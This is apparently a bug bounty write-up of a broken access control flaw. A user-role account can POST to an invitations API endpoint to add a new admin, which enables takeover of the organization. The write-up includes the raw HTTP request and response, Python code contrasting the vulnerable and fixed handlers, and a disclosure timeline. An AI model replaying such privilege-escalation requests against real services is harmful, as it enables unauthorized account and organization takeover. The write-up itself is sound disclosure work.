Unveiling Access Control Flaws: Taking over an entire organization


mohamed othman

In this write-up I want to share with you the story of a recent finding I discovered during testing a web application.

The application has two roles, admin and user. During testing I found a vulnerability that lets an account with the user role add a new admin to the team, even though that role has no permission to invite anyone.

All it takes is a POST request, sent as a user, to the /api/v3/invitations endpoint:

POST /api/v3/invitations HTTP/2
Host: dashboard.redacted.com
Content-Type: application/json
Authorization: Basic <low permission user auth>

{
  "email": "attacker@gmail.com",
  "role": "admin"
}

HTTP/2 201
Content-Type: application/json; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Expires: -1

{
  "response_code": 201,
  "success": true,
  "data": {
    "uuid": "<userid>",
    "email": "attacker@gmail.com",
    "role": "admin"
  }
}

BOOM! As a user with no permission to add users, you have successfully added another admin to the organization. From there you can take over the organization by simply logging in with the attacker email address and deleting the organization's original admin.
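To make the root cause concrete, here is a minimal model of the invitation endpoint with and without a server-side authorization check. This is an added example, not the tested application's code; the policy table, function names and response shapes are assumptions for illustration, and only the request body shape is taken from the write-up.

```python
"""Minimal model of the invitation endpoint's missing authorization check and
its fix. Added example, not the tested application's code; the policy table,
function names and response shapes are assumptions for illustration."""
import json

# Which roles each caller role is allowed to grant through an invitation.
# Assumed policy matching the write-up: only admins may invite at all.
ALLOWED_GRANTS = {"admin": {"user", "admin"}, "user": set()}


def parse_body(raw: str) -> dict:
    """Parse the JSON body and reject anything that is not a known role."""
    body = json.loads(raw)
    if body.get("role") not in ALLOWED_GRANTS:
        raise ValueError("unknown role")
    return body


def invitations_vulnerable(caller_role: str, raw_body: str) -> tuple:
    """Mirrors the flaw: the caller is authenticated (caller_role comes from the
    session) but never authorized, so the requested role is honoured as-is."""
    body = parse_body(raw_body)
    return 201, {"success": True, "data": {"email": body["email"], "role": body["role"]}}


def invitations_fixed(caller_role: str, raw_body: str) -> tuple:
    """Server-side authorization: the decision depends only on the caller's role
    taken from the authenticated session, never on anything in the request body."""
    body = parse_body(raw_body)
    if body["role"] not in ALLOWED_GRANTS.get(caller_role, set()):
        # Nothing is created. A low-privilege principal requesting an admin
        # invitation is also a strong signal worth logging and alerting on.
        return 403, {"success": False, "error": "not permitted to grant this role"}
    return 201, {"success": True, "data": {"email": body["email"], "role": body["role"]}}


# Constructed request body, the same shape as the one in the write-up.
ATTACK_BODY = json.dumps({"email": "attacker@gmail.com", "role": "admin"})

if __name__ == "__main__":
    print(invitations_vulnerable("user", ATTACK_BODY))  # status 201: escalation
    print(invitations_fixed("user", ATTACK_BODY))       # status 403: blocked
```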

28/2/2024 : Report sent
5/3/2024 : Triaged
1/4/2024 : Alhamdulillah reward $$$

Thank you for taking the time to read about my experience. If you have any thoughts or questions, please feel free to share them in the comments section. You can also connect with me on

X (twitter.com): Othman 🇵🇸 (@im0thmann)

LinkedIn: https://www.linkedin.com/in/mohamed-othman-46430722a/

Happy hacking and stay secure!
